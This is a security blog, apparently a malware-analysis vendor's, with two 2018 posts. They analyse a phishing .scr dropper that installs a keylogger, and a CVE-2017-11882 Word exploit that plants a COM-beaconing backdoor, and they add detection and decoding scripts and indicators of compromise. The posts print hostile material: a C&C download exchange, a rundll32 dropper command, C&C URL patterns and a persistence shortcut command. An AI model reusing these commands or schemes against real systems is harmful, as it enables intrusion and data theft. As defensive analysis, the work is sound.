Sunday, 18 March 2018

Happy New Year wishes from China

At the end of January 2018 one of the government agencies in Poland received an email with New Year's wishes, apparently sent by a Chinese government agency. The content of the email was definitely suspicious, so we decided to perform a deeper analysis of this attack attempt.


First of all we have to understand the email header. The Received entries are the most important part of the header, because the Received lines list every host through which the message travelled. We can notice that the real source IP address of the sender is 39.109.6.203, so probably a misconfiguration of one of the Chinese servers allowed the sender's email address to be spoofed.

Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)
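The same check can be automated. The script below is an added example (not from the original post): it unfolds the Received headers of a raw message, parses the "from host (comment [ip]) by host" triple of each hop and returns the IP recorded in the bottom-most (earliest) Received line, which is the host that first handed the message to a mail server. The sample header block is constructed for illustration: the last hop is the line quoted above, while the first hop, the 203.0.113.10 address and the "***" placeholders are assumptions.

```python
import re
from typing import List, Optional

# Constructed sample. Servers prepend Received lines, so the top one is the
# most recent hop and the bottom one records the originating host.
SAMPLE_HEADERS = """\
Received: from mail1.***.gov.cn (mail1.***.gov.cn [203.0.113.10])
    by mx.***.gov.pl (Postfix) with ESMTPS id 1234ABCD
    for <***.gov.pl>; Wed, 31 Jan 2018 02:55:01 +0100 (CET)
Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)
Subject: Happy New Year
"""

# "from <host> (<comment>) by <host>"; the comment usually carries the
# reverse-DNS name (or "unknown") and the connecting IP in square brackets.
RECEIVED_RE = re.compile(
    r"^Received:\s*from\s+(?P<from_host>\S+)"
    r"(?:\s*\((?P<comment>[^)]*)\))?"
    r"\s+by\s+(?P<by_host>\S+)",
    re.IGNORECASE,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold_headers(raw: str) -> List[str]:
    """Join RFC 5322 folded continuation lines so each header is one string."""
    headers: List[str] = []
    for line in raw.splitlines():
        if not line.strip():
            break  # blank line ends the header block
        if line[0] in " \t" and headers:
            headers[-1] += " " + line.strip()
        else:
            headers.append(line.rstrip())
    return headers


def parse_received(header: str) -> Optional[dict]:
    """Extract the hop information from one unfolded Received header."""
    m = RECEIVED_RE.match(header)
    if not m:
        return None
    comment = m.group("comment") or ""
    ip = IP_RE.search(comment)
    return {
        "from_host": m.group("from_host"),
        "from_ip": ip.group(1) if ip else None,
        "by_host": m.group("by_host"),
        # "unknown" means the receiving server found no reverse DNS for the
        # connecting host, a weak but useful indicator for a mail server.
        "reverse_dns_unknown": comment.lower().startswith("unknown"),
    }


def received_chain(raw: str) -> List[dict]:
    """All Received hops, newest first, as they appear in the message."""
    return [h for h in (parse_received(x) for x in unfold_headers(raw)) if h]


def originating_ip(raw: str) -> Optional[str]:
    """IP of the host that injected the message: the oldest Received hop."""
    chain = received_chain(raw)
    return chain[-1]["from_ip"] if chain else None


if __name__ == "__main__":
    for hop in received_chain(SAMPLE_HEADERS):
        print(hop)
    print("originating IP:", originating_ip(SAMPLE_HEADERS))
```

Note that the hop recorded by the Chinese server says ESMTPA, an authenticated submission, so the message was accepted from 39.109.6.203 as if it came from a legitimate user of that server; only the hops added by your own infrastructure are trustworthy, everything below them can be forged by the sender.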


The next step was to analyse the attached RAR archive. It contained only one file, named Happy 2018.scr. After execution we see a nice picture with wishes (presented at the beginning of this article).
The JPG file is stored in the resource section (.rsrc) of the .scr file. Malware often stores an embedded program or configuration data in this section. API function names were obfuscated, but eventually we noticed that the following API calls were used to handle resource objects: FreeResource(), LockResource(), LoadResource(), FindResourceA(), SizeOfResource().


At the same time the malware reads the SYSTEM\CurrentControlSet\Services\disk\Enum registry key. It is a known trick to detect virtual machines: the value lists the hardware IDs of the attached disks, which on a virtual machine usually contain the hypervisor vendor's name.


Using the LoadLibraryA() and GetProcAddress() APIs, further API functions are resolved: OpenServiceA(), StartServiceA(), OpenSCManagerA(), QueryServiceStatus(), ControlService(), CloseServiceHandle(), CreateServiceA(), RegOpenKeyExA(), RegCloseKey(), RegSetValueExA(), RegQueryValueA(), RegCreateKeyA(), RegEnumValueA().
If the malware does not detect a virtual machine, a new service is installed. The service name is Avriax, with the description Multiple defender service with one windows service. The following execution command is added to the Windows registry: %SystemRoot%\system32\svchost -k Avriax. The second-stage malware is a DLL file. It is copied from the BIN resource of the .scr file and is encrypted with the RC4 algorithm using the passphrase “ULoveVas”. After installation the service is started immediately.

00402A97  |. FF15 70504000  CALL DWORD PTR DS:[405070]               ;  ADVAPI32.OpenSCManagerA
00402A9D  |. 8BF8           MOV EDI,EAX
00402A9F  |. 85FF           TEST EDI,EDI
00402AA1  |. 74 32          JE SHORT Happy_20.00402AD5
00402AA3  |. 8B4424 08      MOV EAX,DWORD PTR SS:[ESP+8]
00402AA7  |. 56             PUSH ESI
00402AA8  |. 68 10000100    PUSH 10010
00402AAD  |. 50             PUSH EAX
00402AAE  |. 57             PUSH EDI
00402AAF  |. FF15 74504000  CALL DWORD PTR DS:[405074]               ;  ADVAPI32.OpenServiceA
00402AB5  |. 8BF0           MOV ESI,EAX
00402AB7  |. 85F6           TEST ESI,ESI
00402AB9  |. 74 12          JE SHORT Happy_20.00402ACD
00402ABB  |. 6A 00          PUSH 0
00402ABD  |. 6A 00          PUSH 0
00402ABF  |. 56             PUSH ESI
00402AC0  |. FF15 80504000  CALL DWORD PTR DS:[405080]               ;  ADVAPI32.StartServiceA


The malware connects to the C&C server and downloads another file, 30_1.exe. info.hangro.net resolves to the same IP address, 39.109.6.203.

GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="robots.txt"
Content-Type: application/x-msdownload
Content-Length: 10
Date: Wed, 31 Jan 2018 18:29:18 GMT

30_1.exe
GET /session/manager?mode=30_1.exe&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache
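The exchange above has several properties that a proxy or IDS can key on: the known C&C host and IP, the /session/manager?mode=...&id=... URI shape, the old MSIE 6.0 User-Agent and, on the response side, a binary served with Content-Type application/x-msdownload while Content-Disposition claims a harmless robots.txt. The following detection routine is an added example written for this post, not part of the original analysis; the request and response strings are constructed from the capture above, the benign exchange and the rule names are my own assumptions.

```python
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the post; everything else below is constructed.
IOC_HOSTS = {"info.hangro.net", "vachel.vicp.cc"}
IOC_IPS = {"39.109.6.203"}
DOWNLOADER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

MALICIOUS_REQUEST = (
    "GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: info.hangro.net\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
MALICIOUS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    'Content-Disposition: attachment; filename="robots.txt"\r\n'
    "Content-Type: application/x-msdownload\r\n"
    "Content-Length: 10\r\n"
    "Date: Wed, 31 Jan 2018 18:29:18 GMT\r\n\r\n"
    "30_1.exe\r\n"
)
# Constructed benign exchange used as a control.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0) Firefox/58.0\r\n"
    "Host: www.example.com\r\n\r\n"
)
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 6\r\n\r\n"
    "<html>"
)


def parse_http_message(text: str):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_exchange(request: str, response: Optional[str] = None,
                     dst_ip: Optional[str] = None) -> List[str]:
    """Return the names of every rule the request/response pair matches."""
    alerts: List[str] = []
    start, req_hdrs, _ = parse_http_message(request)
    _method, target, _version = start.split(" ", 2)
    parts = urlsplit(target)
    query = parse_qs(parts.query)

    if req_hdrs.get("host", "") in IOC_HOSTS or dst_ip in IOC_IPS:
        alerts.append("ioc-host")
    # Beacon / download URI shape seen in the capture.
    if parts.path == "/session/manager" and {"mode", "id"}.issubset(query):
        alerts.append("c2-uri-pattern")
    if req_hdrs.get("user-agent") == DOWNLOADER_UA:
        alerts.append("downloader-user-agent")

    if response is not None:
        _status, resp_hdrs, _body = parse_http_message(response)
        ctype = resp_hdrs.get("content-type", "").lower()
        cdisp = resp_hdrs.get("content-disposition", "").lower()
        # An executable MIME type hidden behind a text file name.
        if "x-msdownload" in ctype and ".txt" in cdisp:
            alerts.append("exe-served-as-txt")
    return alerts


if __name__ == "__main__":
    print(inspect_exchange(MALICIOUS_REQUEST, MALICIOUS_RESPONSE, "39.109.6.203"))
    print(inspect_exchange(BENIGN_REQUEST, BENIGN_RESPONSE, "203.0.113.5"))
```

The host and IP rules are the only high-confidence ones; the User-Agent and URI-shape rules exist to keep catching the sample after its infrastructure changes and should be combined with the others rather than alerted on alone.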


The downloaded file is also encrypted with the RC4 algorithm; the passphrase is “Higaisakora.0”. After decryption the executable is launched with the CreateProcessA() API from the C:\Windows\TEMP directory. All strings in this file are encoded. The decoding instructions are presented below:


In the example below we can see another decoded Windows service name. The second service will be installed by the new malware file.


The functionality of the exe file is easily identified by looking at the decoded API names.


The executable also contains a new resource: one more DLL file. This time the malicious DLL is not encrypted. We can use CFF Explorer to extract the new library.


The DLL file is stored in C:\Users\<username>\AppData\Roaming\System\hpptx386.dll and a new service named HP Printer Software is created. This is the last stage of the infection.
The DLL file is a keylogger. All captured data are stored in the Info.dat file and sent to the C&C host vachel.vicp.cc [IP: 39.109.6.203]. There are several methods of implementing keyloggers on Windows. The method used in this example is based on GetAsyncKeyState() and GetKeyState(), which are used to query the status of all keys.


Basic IoCs are listed below:
  • (Happy 2018.scr) SHA1: 511F7BC170C596AD1A26D616359A78851EB7881B
  • (Avriax32.dll) SHA1: 2FB33BF79BCACA2445F66769C5261037C2EF92E2
  • (30_1.exe - encrypted) SHA1: 82BAC0B378285F914C518F39F54DA3E4A7A54588
  • (decrypted) SHA1: F372CE319060F103714D0F8897F846452786BB31
  • (hpptx386.dll) SHA1: 83B995717F82F97D3A65C7E6FBFB59908EEDE811
  • 39.109.6.203
  • info.hangro.net
  • vachel.vicp.cc

Saturday, 13 January 2018

An example of static analysis of an APT malware


This article describes how to perform static analysis of a suspicious file using a few tools: Oletools, IDA and RetDec.

A few weeks ago, an email with a suspicious attachment was sent to one of the government agencies in Poland. The attached file is named BG Presidency Draft Calendar-Final.doc.

SHA1 of the doc file is: 601367EED1DDC8473F99CAAA4E2673C13E5D30D7

The first step is to verify the content of the .doc file. One of the tools we usually use at Prevenity is Oletools, a package of Python tools for analysing Microsoft OLE2 files.


The rtfobj tool extracted the OLE objects for us. One of them (#2) contains the command cMD /c rundll32 “%temp%\osk.exe”,Start. Now we know that the entry point is the Start function exported by osk.exe (which is actually a DLL).
We can also notice that the class name of this object is Equation.3. Part of the dumped object is presented below.


The exploit used in this doc file (CVE-2017-11882) targets the executable module EQNEDT32.EXE (Microsoft Equation Editor).

Note: we can easily confirm that the Equation Editor was used by analysing the output of Process Monitor.


Let's come back to static analysis. The other OLE object (#0) is an executable file, but it is a DLL, not an EXE.

SHA1 of extracted dll file: D9276ED0D9370CE08970F869591E93185D3D022C

A few weeks ago Avast did a great job by releasing the source code of the RetDec decompiler. Let's use it to perform the initial analysis of our PE binary.

The first interesting observation is that the malware tries to hide its communication with the C&C by using COM. COM allows malware developers to perform HTTP communication through an iexplore.exe process in which the browser session is hidden. The malware uses a few interesting functions: CoInitialize() and CoCreateInstance(). The first initializes the COM library; the second creates an object of the class associated with a specified CLSID.


The registry value confirms that the malware creates an instance of Internet Explorer.
The malware collects some basic information about the infected host, such as hostname, username and operating system type, and sends it to the C&C server in an HTTP GET. This data is encrypted with a simple formula: subtract 0x41 from the current letter and XOR the result with the counter.



The encrypted data is then encoded with Base64. RetDec identified the Base64 function and noted it in a comment.
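The two steps just described (subtract 0x41, XOR with the counter, then Base64) are simple enough to reimplement, which lets an analyst decode beacons captured from the proxy without running the sample. The script below is an added example and not the authors' code; it assumes the counter is the zero-based byte index truncated to 8 bits, and the host-info string with its field separator is a constructed sample.

```python
import base64


def encode_host_info(text: str) -> str:
    """Apply the malware's scheme: (byte - 0x41) XOR index, then Base64."""
    raw = text.encode("ascii")
    # Assumption: the counter is the zero-based byte index, wrapped to 8 bits.
    enc = bytes(((b - 0x41) & 0xFF) ^ (i & 0xFF) for i, b in enumerate(raw))
    return base64.b64encode(enc).decode("ascii")


def decode_host_info(b64: str) -> str:
    """Reverse the scheme on a value captured from a GET request."""
    enc = base64.b64decode(b64)
    plain = bytes(((b ^ (i & 0xFF)) + 0x41) & 0xFF for i, b in enumerate(enc))
    return plain.decode("ascii", errors="replace")


# Constructed beacon payload; the '|' separator is an assumption.
SAMPLE_HOST_INFO = "WIN-RME55NNMJCN|IEUser|Windows 7"


if __name__ == "__main__":
    encoded = encode_host_info(SAMPLE_HOST_INFO)
    print("GET parameter value:", encoded)
    print("decoded:", decode_host_info(encoded))
```

Because each byte is transformed independently, "ABC" encodes to "AAAA": every letter minus 0x41 equals its own index, so the XOR cancels it to zero. That kind of structure is why a short captured value can often be recognised as this scheme by eye before any decoder is written.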


The response from the C&C server carries a value parameter in the message body. The content of this parameter is encrypted data (commands to execute) which must be decrypted with the code below.


In the next step the malware searches for the characters „~~”; this is how the commands from the C&C server are extracted. The next few instructions check that the command id contains only the digits 0-9, with space as a separator.
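Seen from the other side, the same parsing rules describe what a replayed or emulated C&C response has to look like, which is useful when building a fake server to observe the sample in a sandbox. The parser below is an added example, not code from the post: it pulls the value parameter out of a response body and splits the already decrypted task text on „~~”, validating each command id against the digits-and-space rule. The decryption step is deliberately left out because the post does not reproduce it, and the layout of alternating id and argument fields is an assumption, as is the sample task text.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

SEPARATOR = "~~"
# Command ids may only contain 0-9 and space (space separates several ids).
CMD_ID_RE = re.compile(r"^[0-9 ]+$")


def extract_value(body: str) -> Optional[str]:
    """Return the 'value' parameter of a form-encoded response body, if any."""
    values = parse_qs(body).get("value")
    return values[0] if values else None


def parse_commands(plaintext: str) -> List[Tuple[List[int], str]]:
    """Split decrypted task text into (ids, argument) pairs.

    Assumed layout: id ~~ argument ~~ id ~~ argument ...; an id field that is
    not digits/spaces makes the whole message invalid, mirroring the check the
    malware performs.
    """
    fields = plaintext.split(SEPARATOR)
    if len(fields) % 2 != 0:
        raise ValueError("odd number of fields: missing argument for last command")
    tasks: List[Tuple[List[int], str]] = []
    for cmd_id, argument in zip(fields[0::2], fields[1::2]):
        if not CMD_ID_RE.match(cmd_id):
            raise ValueError(f"invalid command id {cmd_id!r}")
        ids = [int(tok) for tok in cmd_id.split()]
        if not ids:
            raise ValueError("command id field is empty")
        tasks.append((ids, argument))
    return tasks


# Constructed samples; the decrypted text stands in for the output of the
# malware's own (unreproduced) decryption routine.
SAMPLE_BODY = "status=ok&value=ZW5jcnlwdGVkLXRhc2tz"
SAMPLE_DECRYPTED = "1~~whoami~~3~~C:\\Users\\IEUser\\Desktop\\notes.txt~~2 5~~fw1ei.tmp"


if __name__ == "__main__":
    print("value parameter:", extract_value(SAMPLE_BODY))
    for ids, arg in parse_commands(SAMPLE_DECRYPTED):
        print(ids, arg)
```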


We can identify several conditions that direct the code to execute commands, read files or delete files. All content sent to the C&C server is encrypted with a symmetric session key.


One of the features is executing commands on the compromised machine. The results are stored in the fw1ei.tmp file.


As we can see, wsprintfA() is used to prepare the final command. The first parameter of wsprintfA() is built a few lines above:

*(char *)(v3 | 2) = *(char *)((int32_t)"Cm" + 2);

By concatenating „Cm” with „D” the malware builds the command cmd and appends the name of the destination executable received from the C&C server.

Depending on the command, the result is sent to one of the URLs below:
  • http://%s/view.aspx?li=%s
  • http://%s/post.aspx?fs=%s
  • http://%s/li.aspx?id=%s
  • http://%s/query.aspx?q=%s

Some IoCs are presented below:

C&C server: maps.fakemediavis.com
IP address: 115.144.238.67
Created files:
  • C:\Users\<username>\AppData\Roaming\mozilla\mozlib.dll
  • C:\Users\<username>\AppData\Local\Temp\Microsoft Office Update.lnk with content: C:\Windows\system32\rundll32.exe C:\Users\IEUser\AppData\Roaming\mozilla\mozlib.dll,Start
SHA1 Hash values:
  • 601367EED1DDC8473F99CAAA4E2673C13E5D30D7
  • D9276ED0D9370CE08970F869591E93185D3D022C

External links: